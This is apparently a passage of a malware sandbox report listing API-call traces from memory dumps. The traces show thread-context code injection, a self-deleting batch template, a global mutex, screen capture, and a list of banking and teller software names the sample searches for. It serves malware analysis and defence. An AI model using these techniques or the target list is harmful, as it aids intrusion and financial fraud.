Part of subcall function 00B1046D: LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

Sleep.KERNEL32(000005DC), ref: 00B055D3
WaitForSingleObject.KERNEL32(?,000005DC), ref: 00B055DC

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF8162, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

TlsAlloc.KERNEL32(00DB2864,00AF8636,?,?,?,?,00DB2858,?), ref: 00AF816B
TlsGetValue.KERNEL32(?,00000001,00DB2864), ref: 00AF817D
TlsSetValue.KERNEL32(?,?), ref: 00AF81C2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF1AAE, Relevance: 5.5, APIs: 3, Instructions: 46

APIs

CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 00AF1ACA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00AF1AED
CloseHandle.KERNEL32 ref: 00AF1AFA

Part of subcall function 00AEE826: SetFileAttributesW.KERNEL32(?,00000080), ref: 00AEE82F
Part of subcall function 00AEE826: DeleteFileW.KERNEL32(?), ref: 00AEE836

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFDCF8, Relevance: 5.5, APIs: 3, Instructions: 33

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00AFDD10
CreateFileMappingW.KERNEL32(?,00000000,00000008,00000000,00000000,00000000), ref: 00AFDD24
CloseHandle.KERNEL32 ref: 00AFDD37

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B13CFF, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 26

APIs

StrCmpNA.SHLWAPI(Basic ,?,00000000), ref: 00B13D14
lstrcmpA.KERNEL32(Basic ,?,00B001C0,00000006,Authorization,?,?,?), ref: 00B13D1E

Strings

Basic , xrefs: 00B13D13 00B13D1D

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF561F, Relevance: 5.4, APIs: 3, Instructions: 24

APIs

memset.MSVCRT ref: 00AF5639
TlsAlloc.KERNEL32(?,?,?,?,?,?,00AF1992,?,?,?,?,00B048EB,?,?,00000000), ref: 00AF5642
InitializeCriticalSection.KERNEL32(00B227DC), ref: 00AF5652

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AFDCB8, Relevance: 5.4, APIs: 3, Instructions: 21

APIs

UnmapViewOfFile.KERNEL32 ref: 00AFDCC4
CloseHandle.KERNEL32 ref: 00AFDCD7
CloseHandle.KERNEL32 ref: 00AFDCED

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B1042D, Relevance: 5.4, APIs: 3, Instructions: 19

APIs

InitializeCriticalSection.KERNEL32(00B230F4), ref: 00B10437
QueryPerformanceCounter.KERNEL32(?), ref: 00B10441
GetTickCount.KERNEL32 ref: 00B1044B

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B13C83, Relevance: 5.3, APIs: 2, Instructions: 26

APIs

StrCmpNIW.SHLWAPI(?,?,00000000), ref: 00B13C98
StrCmpIW.SHLWAPI(?,?), ref: 00B13CA2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF69B0, Relevance: 5.3, APIs: 1, Instructions: 9

APIs

Part of subcall function 00AF692C: EnterCriticalSection.KERNEL32(00B23510,00000024,00AF699F,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF693C
Part of subcall function 00AF692C: LeaveCriticalSection.KERNEL32(00B23510,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF6966

HeapAlloc.KERNEL32(00000008,?,?,00AF519B,?,?,?,?,00B046A1,?,00B049A5,?,?,00000001), ref: 00AF69C1

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B02866, Relevance: 5.2, APIs: 4, Instructions: 191

APIs

Part of subcall function 00AF6997: HeapAlloc.KERNEL32(00000000,00000024,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF69A8

memcpy.MSVCRT ref: 00B029C9
memcpy.MSVCRT ref: 00B029DC
memcpy.MSVCRT ref: 00B029FD

Part of subcall function 00B065F4: StrCmpNIA.SHLWAPI(?,nbsp;,00000005), ref: 00B0675C

Part of subcall function 00AF6A19: HeapAlloc.KERNEL32(00000008,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?,?), ref: 00AF6A43
Part of subcall function 00AF6A19: HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,00B0CB50,?,00000000,00000001,00000001,00B0CB1A,?,00AF54E4,?,@echo off%sdel /F "%s",?), ref: 00AF6A56

memcpy.MSVCRT ref: 00B02A6F

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Part of subcall function 00AF6A7D: memcpy.MSVCRT ref: 00AF6A9C

Part of subcall function 00B023E2: memmove.MSVCRT ref: 00B02653
Part of subcall function 00B023E2: memcpy.MSVCRT ref: 00B02662

Part of subcall function 00B026D6: memcpy.MSVCRT ref: 00B0274B
Part of subcall function 00B026D6: memmove.MSVCRT ref: 00B02811
Part of subcall function 00B026D6: memcpy.MSVCRT ref: 00B02820

Part of subcall function 00AFE61B: strcmp.MSVCRT(?,?,00000009,?,00000007,?,00000008,?,?,?,?,00000000,?,?,?,?), ref: 00AFE688

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF69C9, Relevance: 5.1, APIs: 2, Instructions: 32

APIs

HeapReAlloc.KERNEL32(00000000,?,?,?,00B14E9D,00AE9851,?,?,00B14FB1,?,?,?,?,?,?), ref: 00AF6A06

Part of subcall function 00AF692C: EnterCriticalSection.KERNEL32(00B23510,00000024,00AF699F,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF693C
Part of subcall function 00AF692C: LeaveCriticalSection.KERNEL32(00B23510,?,00AF17BF,?,00000000,00B04986,?,?,00000001), ref: 00AF6966

HeapAlloc.KERNEL32(00000000,?,?,00B14E9D,00AE9851,?,?,00B14FB1,?,?,?,?,?,?,?,?), ref: 00AF69F3

Part of subcall function 00AF6A69: HeapFree.KERNEL32(00000000,00DB1E90,00AF1877,?,00000000,00B04986,?,?,00000001), ref: 00AF6A76

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B1046D, Relevance: 5.1, APIs: 2, Instructions: 14

APIs

Part of subcall function 00B102BE: EnterCriticalSection.KERNEL32(00B23510,?,00B10474,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B102CE
Part of subcall function 00B102BE: LeaveCriticalSection.KERNEL32(00B23510,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B102F8

EnterCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B1047A
LeaveCriticalSection.KERNEL32(00B230F4,?,?,00AEE3BD,00000000,?,?,00000001), ref: 00B10488

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00B00D19, Relevance: 5.1, APIs: 2, Instructions: 12

APIs

RegFlushKey.ADVAPI32 ref: 00B00D29
RegCloseKey.ADVAPI32 ref: 00B00D31

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AEE826, Relevance: 5.1, APIs: 2, Instructions: 12

APIs

SetFileAttributesW.KERNEL32(?,00000080), ref: 00AEE82F
DeleteFileW.KERNEL32(?), ref: 00AEE836

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AF2FB7, Relevance: 5.1, APIs: 2, Instructions: 8

APIs

ReleaseMutex.KERNEL32 ref: 00AF2FBB
CloseHandle.KERNEL32 ref: 00AF2FC2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Function 00AED7BE, Relevance: 5.1, APIs: 4, Instructions: 69

APIs

GetLastError.KERNEL32 ref: 00AED810
EnterCriticalSection.KERNEL32 ref: 00AED82D
memcpy.MSVCRT ref: 00AED878
LeaveCriticalSection.KERNEL32(?,?,00000000,00000001), ref: 00AED892

Part of subcall function 00AED6C8: EnterCriticalSection.KERNEL32(?,?,?,?,00AED979,00000001,?,00000000,?,?,?,00000000,00000000), ref: 00AED6D2
Part of subcall function 00AED6C8: memcpy.MSVCRT ref: 00AED74E
Part of subcall function 00AED6C8: memcpy.MSVCRT ref: 00AED762
Part of subcall function 00AED6C8: memcpy.MSVCRT ref: 00AED78C
Part of subcall function 00AED6C8: LeaveCriticalSection.KERNEL32(?,?,?,00000001,?,?,?,?,00AED979,00000001,?,00000000,?,?,?,00000000), ref: 00AED7B2

Memory Dump Source

Source File: 00000006.00000002.1175643400.00AE0000.00000040.sdmp, Offset: 00AE0000, based on PE: true

Analysis Process: cmd.exe PID: 116 Parent PID: 1632

Executed Functions

Function 001507D0, Relevance: 16.1, APIs: 9, Instructions: 156

APIs

GetCurrentThreadId.KERNEL32 ref: 001507D6
memcpy.MSVCRT ref: 00150822
memset.MSVCRT ref: 0015085A
GetThreadContext.KERNEL32(?,?), ref: 00150895
SetThreadContext.KERNEL32(?,?), ref: 00150900
GetCurrentProcess.KERNEL32 ref: 00150919
VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 0015093E
FlushInstructionCache.KERNEL32(?,?,0000007C), ref: 00150950

Part of subcall function 00150643: memset.MSVCRT ref: 00150654

Part of subcall function 001503FD: GetCurrentProcess.KERNEL32 ref: 00150400
Part of subcall function 001503FD: VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 00150421
Part of subcall function 001503FD: FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 0015042A

ResumeThread.KERNEL32(?), ref: 00150992

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 0015072F: GetCurrentThreadId.KERNEL32 ref: 00150730
Part of subcall function 0015072F: VirtualProtect.KERNEL32(?,0000007C,?,?), ref: 00150767
Part of subcall function 0015072F: ResumeThread.KERNEL32(?), ref: 001507A8

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001648F2, Relevance: 14.5, APIs: 5, Strings: 2, Instructions: 121

APIs

GetModuleHandleW.KERNEL32 ref: 00164932

Part of subcall function 00150FC3: LoadLibraryA.KERNEL32 ref: 00151013

Part of subcall function 00151791: InitializeCriticalSection.KERNEL32(00183510), ref: 001517B1
Part of subcall function 00151791: InitializeCriticalSection.KERNEL32 ref: 001517C6
Part of subcall function 00151791: memset.MSVCRT ref: 001517DB
Part of subcall function 00151791: TlsAlloc.KERNEL32(?,00000000,00164986,?,?,00000001), ref: 001517F2
Part of subcall function 00151791: GetModuleHandleW.KERNEL32(?), ref: 00151817

WSAStartup.WS2_32(00000202,?), ref: 00164998
CreateEventW.KERNEL32(00182974,00000001), ref: 001649BA

Part of subcall function 0015500E: OpenProcessToken.ADVAPI32(?,00000008,?), ref: 00155020
Part of subcall function 0015500E: GetTokenInformation.ADVAPI32(?,0000000C,00182968,00000004,?), ref: 00155048
Part of subcall function 0015500E: CloseHandle.KERNEL32(?), ref: 0015505E

GetLengthSid.ADVAPI32(?,?,?,00000001), ref: 001649EC

Part of subcall function 001646CB: GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0016470E

GetCurrentProcessId.KERNEL32 ref: 00164A17

Part of subcall function 0016472D: SHGetFolderPathW.SHELL32(00000000,00000025,00000000,00000000,?), ref: 00164777
Part of subcall function 0016472D: lstrcmpiW.KERNEL32(?,?), ref: 001647A6

Part of subcall function 001647E5: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00164819
Part of subcall function 001647E5: lstrcatW.KERNEL32(?,.dat), ref: 00164879
Part of subcall function 001647E5: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0016489E
Part of subcall function 001647E5: ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 001648BB
Part of subcall function 001647E5: CloseHandle.KERNEL32 ref: 001648C8

Part of subcall function 001640F3: IsBadReadPtr.KERNEL32 ref: 0016412C

Strings

GetProcAddress, xrefs: 00164941
LoadLibraryA, xrefs: 0016494D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001647E5, Relevance: 14.3, APIs: 5, Strings: 2, Instructions: 93

APIs

Part of subcall function 00149F72: memcpy.MSVCRT ref: 00149F80

MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 00164819

Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016439E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI ref: 001643A8
Part of subcall function 0016432D: memcpy.MSVCRT ref: 001643F1
Part of subcall function 0016432D: memcpy.MSVCRT ref: 0016441E
Part of subcall function 0016432D: PathRemoveBackslashW.SHLWAPI(?), ref: 00164428

lstrcatW.KERNEL32(?,.dat), ref: 00164879
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0016489E
ReadFile.KERNEL32(?,?,000001FE,?,00000000), ref: 001648BB
CloseHandle.KERNEL32 ref: 001648C8

Part of subcall function 00151905: EnterCriticalSection.KERNEL32(00C01E90,00000000,?,?,?,?,001648EB,?,?,00000000), ref: 00151913
Part of subcall function 00151905: GetFileVersionInfoSizeW.VERSION(00C01EF0,?,?,?,?,?,001648EB,?,?,00000000), ref: 00151933
Part of subcall function 00151905: GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,001648EB,?,?,00000000), ref: 00151953
Part of subcall function 00151905: LeaveCriticalSection.KERNEL32(00C01E90,?,?,?,?,001648EB,?,?,00000000), ref: 001519D2

Strings

C:\Documents and Settings\Administrator\Local Settings\Application Data, xrefs: 0016483A
.dat, xrefs: 0016486D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0017358E, Relevance: 14.3, APIs: 6, Strings: 1, Instructions: 64

APIs

InitializeSecurityDescriptor.ADVAPI32(00182980,00000001), ref: 0017359E
SetSecurityDescriptorDacl.ADVAPI32(00182980,00000001,00000000,00000000), ref: 001735AF
ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 001735C5
GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?), ref: 001735E1
SetSecurityDescriptorSacl.ADVAPI32(00182980,?,00000001,?), ref: 001735F5
LocalFree.KERNEL32(?), ref: 00173607

Strings

S:(ML;;NRNWNX;;;LW), xrefs: 001735C0

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015043B, Relevance: 12.6, APIs: 7, Instructions: 173

APIs

memset.MSVCRT ref: 001504EB
VirtualQuery.KERNEL32(?,?,0000001C), ref: 001504FC
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00150530
memset.MSVCRT ref: 00150570
VirtualQuery.KERNEL32(?,?,0000001C), ref: 00150581
VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 001505C1
memset.MSVCRT ref: 0015062C

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001509C2, Relevance: 11.1, APIs: 5, Instructions: 210

APIs

GetCurrentThreadId.KERNEL32 ref: 001509D3

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

Part of subcall function 0015043B: memset.MSVCRT ref: 001504EB
Part of subcall function 0015043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 001504FC
Part of subcall function 0015043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 00150530
Part of subcall function 0015043B: memset.MSVCRT ref: 00150570
Part of subcall function 0015043B: VirtualQuery.KERNEL32(?,?,0000001C), ref: 00150581
Part of subcall function 0015043B: VirtualAlloc.KERNEL32(?,00010000,00003000,00000040), ref: 001505C1
Part of subcall function 0015043B: memset.MSVCRT ref: 0015062C

Part of subcall function 00149BA9: SetLastError.KERNEL32(0000000D), ref: 00149BE4

memcpy.MSVCRT ref: 00150B42
memset.MSVCRT ref: 00150BA8
VirtualProtect.KERNEL32(?,?,00000040,?), ref: 00150BBD
GetLastError.KERNEL32(?,00000040,?,?,?,00000000), ref: 00150BC7

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

Part of subcall function 00150643: memset.MSVCRT ref: 00150654

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0016582C, Relevance: 9.2, APIs: 3, Strings: 1, Instructions: 38

APIs

EnterCriticalSection.KERNEL32(00183510,?,?,?,0015E9BA), ref: 00165842
LeaveCriticalSection.KERNEL32(00183510,?,?,?,0015E9BA), ref: 00165868

Part of subcall function 0016575A: memset.MSVCRT ref: 00165774
Part of subcall function 0016575A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,?,00000014), ref: 001657BA

CreateMutexW.KERNEL32(00182974,00000000,Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}), ref: 0016587A

Part of subcall function 00152F31: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00152F37
Part of subcall function 00152F31: CloseHandle.KERNEL32 ref: 00152F49

Strings

Global\{F1516FED-D191-40B4-FB56-FD56EA1DDE44}, xrefs: 0016586F

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00151905, Relevance: 7.2, APIs: 4, Instructions: 71

APIs

EnterCriticalSection.KERNEL32(00C01E90,00000000,?,?,?,?,001648EB,?,?,00000000), ref: 00151913

Part of subcall function 00153764: GetModuleHandleW.KERNEL32(?), ref: 00153780
Part of subcall function 00153764: GetModuleHandleW.KERNEL32(?), ref: 001537BB

GetFileVersionInfoSizeW.VERSION(00C01EF0,?,?,?,?,?,001648EB,?,?,00000000), ref: 00151933
GetFileVersionInfoW.VERSION(?,00000000,?,?,?,?,?,?,001648EB,?,?,00000000), ref: 00151953

Part of subcall function 00174D77: GetCommandLineW.KERNEL32 ref: 00174E01
Part of subcall function 00174D77: CommandLineToArgvW.SHELL32 ref: 00174E08
Part of subcall function 00174D77: LocalFree.KERNEL32 ref: 00174E48
Part of subcall function 00174D77: GetModuleHandleW.KERNEL32(?), ref: 00174E8A

Part of subcall function 0014BBAD: VerQueryValueW.VERSION(?,001475E4,?,?,00C01E90,?,00151983,?,?,?,?,?,?,001648EB), ref: 0014BBCE
Part of subcall function 0014BBAD: GetModuleHandleW.KERNEL32(?), ref: 0014BC0F

Part of subcall function 0015D8C0: GetModuleHandleW.KERNEL32(?), ref: 0015D8DD

Part of subcall function 0014E2C1: EnterCriticalSection.KERNEL32(00183510,00C01E90,0015198D,?,?,?,?,?,?,001648EB,?,?,00000000), ref: 0014E2D1
Part of subcall function 0014E2C1: LeaveCriticalSection.KERNEL32(00183510,?,?,?,?,?,?,001648EB,?,?,00000000), ref: 0014E2F9

Part of subcall function 0014D987: InitializeCriticalSection.KERNEL32 ref: 0014D9B5
Part of subcall function 0014D987: GetModuleHandleW.KERNEL32(?), ref: 0014DA1C

Part of subcall function 0014E209: InitializeCriticalSection.KERNEL32 ref: 0014E21E

Part of subcall function 0015599B: EnterCriticalSection.KERNEL32(001827DC,00000000,0014D9CE,00C01E90,?,?,?,00151992,?,?,?,?,001648EB,?,?,00000000), ref: 001559A7
Part of subcall function 0015599B: LeaveCriticalSection.KERNEL32(001827DC,?,?,?,00151992,?,?,?,?,001648EB,?,?,00000000), ref: 001559B7

Part of subcall function 001559C5: LeaveCriticalSection.KERNEL32(001827DC,00155A45,00000002,?,?,?,0014DAA2,00000002,00000001,000000FF), ref: 001559CF

Part of subcall function 001559D6: LeaveCriticalSection.KERNEL32(001827DC,?,0014D9F7,00000009,00C01E90,?,?,?,00151992,?,?,?,?,001648EB), ref: 001559E3

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

LeaveCriticalSection.KERNEL32(00C01E90,?,?,?,?,001648EB,?,?,00000000), ref: 001519D2

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015506A, Relevance: 7.2, APIs: 4, Instructions: 38

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0015507A
Thread32First.KERNEL32(?,?), ref: 00155095
Thread32Next.KERNEL32(?,?), ref: 001550A8
CloseHandle.KERNEL32 ref: 001550B3

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015EA5E, Relevance: 7.2, APIs: 4, Instructions: 28

APIs

CreateThread.KERNEL32(00000000,00000000,Function_0001E9A0,00000000), ref: 0015EA75
WaitForSingleObject.KERNEL32(?,00003A98), ref: 0015EA87
TerminateThread.KERNEL32(?,00000000), ref: 0015EA93
CloseHandle.KERNEL32 ref: 0015EA9A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001503FD, Relevance: 5.6, APIs: 3, Instructions: 28

APIs

GetCurrentProcess.KERNEL32 ref: 00150400
VirtualProtect.KERNEL32(3D920000,00010000,00000020,?), ref: 00150421
FlushInstructionCache.KERNEL32(?,3D920000,00010000), ref: 0015042A

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 001506B9, Relevance: 5.5, APIs: 3, Instructions: 37

APIs

GetCurrentThreadId.KERNEL32 ref: 001506CE
InterlockedCompareExchange.KERNEL32(0018276C), ref: 001506DA
VirtualProtect.KERNEL32(3D920000,00010000,00000040,?), ref: 0015071E

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015D904, Relevance: 3.1, APIs: 2, Instructions: 79

APIs

Part of subcall function 00155A4F: GetLastError.KERNEL32(?,?,0014B9B4), ref: 00155A51
Part of subcall function 00155A4F: TlsGetValue.KERNEL32(?,?,0014B9B4), ref: 00155A6E
Part of subcall function 00155A4F: TlsSetValue.KERNEL32(00000001), ref: 00155A80
Part of subcall function 00155A4F: SetLastError.KERNEL32(?,?,0014B9B4), ref: 00155A90

NtQueryInformationProcess.NTDLL(?,00000000,?,00000018), ref: 0015D93C

Part of subcall function 0016BE5A: CreateMutexW.KERNEL32(00182974,00000001,?), ref: 0016BEA0
Part of subcall function 0016BE5A: GetLastError.KERNEL32(?,?,?,00000002,00000000), ref: 0016BEAC
Part of subcall function 0016BE5A: CloseHandle.KERNEL32 ref: 0016BEBA

Part of subcall function 0014FBD5: TlsGetValue.KERNEL32(?,?,0015D975), ref: 0014FBDE

Part of subcall function 00164A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00164A89
Part of subcall function 00164A6B: DuplicateHandle.KERNEL32(000000FF,?,?,?,00000000,00000000,00000002), ref: 00164AC4
Part of subcall function 00164A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00164B04
Part of subcall function 00164A6B: WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00164B27
Part of subcall function 00164A6B: VirtualFreeEx.KERNEL32(?,?,00000000,00008000), ref: 00164B77

CloseHandle.KERNEL32 ref: 0015D9B1

Part of subcall function 0015506A: CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0015507A
Part of subcall function 0015506A: Thread32First.KERNEL32(?,?), ref: 00155095
Part of subcall function 0015506A: Thread32Next.KERNEL32(?,?), ref: 001550A8
Part of subcall function 0015506A: CloseHandle.KERNEL32 ref: 001550B3

Part of subcall function 00155AD5: GetLastError.KERNEL32(?,0014BA1E), ref: 00155AD6
Part of subcall function 00155AD5: TlsSetValue.KERNEL32(00000000), ref: 00155AE6
Part of subcall function 00155AD5: SetLastError.KERNEL32(?,?,0014BA1E), ref: 00155AED

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00160E64, Relevance: 2.2, APIs: 1, Instructions: 68

APIs

Part of subcall function 00156997: HeapAlloc.KERNEL32(00000000,00000024,?,001517BF,?,00000000,00164986,?,?,00000001), ref: 001569A8

Part of subcall function 00160DFC: RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00160E10

Part of subcall function 00156A69: HeapFree.KERNEL32(00000000,00C01E90,00151877,?,00000000,00164986,?,?,00000001), ref: 00156A76

RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00160EBF

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00150FC3, Relevance: 2.2, APIs: 1, Instructions: 68

APIs

LoadLibraryA.KERNEL32 ref: 00151013

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 0015696E, Relevance: 1.9, APIs: 1, Instructions: 9

APIs

HeapCreate.KERNEL32(00000000,00080000,00000000), ref: 00156977

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00160DFC, Relevance: 1.9, APIs: 1, Instructions: 8

APIs

RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,?,?), ref: 00160E10

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Non-executed Functions

Function 0014DBE8, Relevance: 66.8, APIs: 19, Strings: 19, Instructions: 103

APIs

StrStrIW.SHLWAPI(tellerplus), ref: 0014DBFA
StrStrIW.SHLWAPI(bancline), ref: 0014DC0F
StrStrIW.SHLWAPI(fidelity), ref: 0014DC24
StrStrIW.SHLWAPI(micrsolv), ref: 0014DC39
StrStrIW.SHLWAPI(bankman), ref: 0014DC4E
StrStrIW.SHLWAPI(vantiv), ref: 0014DC63
StrStrIW.SHLWAPI(episys), ref: 0014DC78
StrStrIW.SHLWAPI(jack henry), ref: 0014DC8D
StrStrIW.SHLWAPI(cruisenet), ref: 0014DCA2
StrStrIW.SHLWAPI(gplusmain), ref: 0014DCB7
StrStrIW.SHLWAPI(launchpadshell.exe), ref: 0014DCCC
StrStrIW.SHLWAPI(dirclt32.exe), ref: 0014DCE1
StrStrIW.SHLWAPI(wtng.exe), ref: 0014DCF2
StrStrIW.SHLWAPI(prologue.exe), ref: 0014DD03
StrStrIW.SHLWAPI(silverlake), ref: 0014DD14
StrStrIW.SHLWAPI(pcsws.exe), ref: 0014DD25
StrStrIW.SHLWAPI(v48d0250s1), ref: 0014DD36
StrStrIW.SHLWAPI(fdmaster.exe), ref: 0014DD47
StrStrIW.SHLWAPI(fastdoc), ref: 0014DD58

Strings

tellerplus, xrefs: 0014DBEF
bancline, xrefs: 0014DC04
fidelity, xrefs: 0014DC19
micrsolv, xrefs: 0014DC2E
bankman, xrefs: 0014DC43
vantiv, xrefs: 0014DC58
episys, xrefs: 0014DC6D
jack henry, xrefs: 0014DC82
cruisenet, xrefs: 0014DC97
gplusmain, xrefs: 0014DCAC
launchpadshell.exe, xrefs: 0014DCC1
dirclt32.exe, xrefs: 0014DCD6
wtng.exe, xrefs: 0014DCE7
prologue.exe, xrefs: 0014DCF8
silverlake, xrefs: 0014DD09
pcsws.exe, xrefs: 0014DD1A
v48d0250s1, xrefs: 0014DD2B
fdmaster.exe, xrefs: 0014DD3C
fastdoc, xrefs: 0014DD4D

Memory Dump Source

Source File: 00000007.00000002.829357742.00140000.00000040.sdmp, Offset: 00140000, based on PE: true

Function 00154085, Relevance: 48.4, APIs: 20, Strings: 4, Instructions: 151

APIs

LoadLibraryA.KERNEL32(gdiplus.dll), ref: 00154097
GetProcAddress.KERNEL32(?,GdiplusStartup), ref: 001540AF
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 001540EE
CreateCompatibleDC.GDI32 ref: 001540FF
LoadCursorW.USER32(00000000,00007F00), ref: 00154115
GetIconInfo.USER32(?,?), ref: 00154129
GetCursorPos.USER32(?), ref: 00154138
GetDeviceCaps.GDI32(?,00000008), ref: 0015414F
GetDeviceCaps.GDI32(?,0000000A), ref: 00154158
CreateCompatibleBitmap.GDI32(?,?), ref: 00154164
